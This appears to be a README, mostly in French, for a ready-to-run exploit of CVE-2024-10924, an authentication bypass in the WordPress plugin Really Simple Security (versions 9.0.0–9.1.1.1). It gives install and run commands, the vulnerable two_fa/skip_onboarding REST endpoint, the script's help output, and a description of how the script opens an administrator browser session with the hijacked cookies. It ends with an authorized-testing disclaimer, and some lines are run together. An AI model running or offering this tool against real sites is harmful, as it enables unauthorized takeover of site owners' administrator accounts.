
Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Contournement d'authentification
Really Simple Security (Gratuit, Pro et Pro Multisite) 9.0.0 - 9.1.1.1 - Contournement d'authentification
Ce script exploite une vulnérabilité dans le plugin Really Simple Security (versions 9.0.0 - 9.1.1.1) pour WordPress. La faille permet un contournement d'authentification en raison d'une gestion d'erreur incorrecte dans la fonction check_login_and_get_user de l'API d'authentification à deux facteurs.
En utilisant cet exploit, un attaquant peut se connecter en tant que n'importe quel utilisateur (par exemple, administrateur) si la 2FA est activée. Une fois authentifié, le script lance automatiquement une session navigateur avec les cookies de session obtenus.
Avant d'exécuter le script, installez les dépendances requises :
pip install requests selenium webdriver-manager
python CVE-2024-10924.py -u http://TARGET-WEBSITE.com/
/wp-json/reallysimplessl/v1/two_fa/skip_onboarding
/wp-admin/, accordant un accès administrateur sans nécessiter de mot de passe.usage: CVE-2024-10924.py [-h] -u URL
WordPress Login Exploit | Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 - 9.1.1.1 - Authentication
Bypass
options:
-h, --help show this help message and exit
-u URL, --url URL Target WordPress URL
Ce script est destiné uniquement à des fins éducatives et à des évaluations de sécurité autorisées. Une utilisation abusive de ce script peut entraîner des conséquences juridiques. Obtenez toujours une autorisation appropriée avant de tester un système.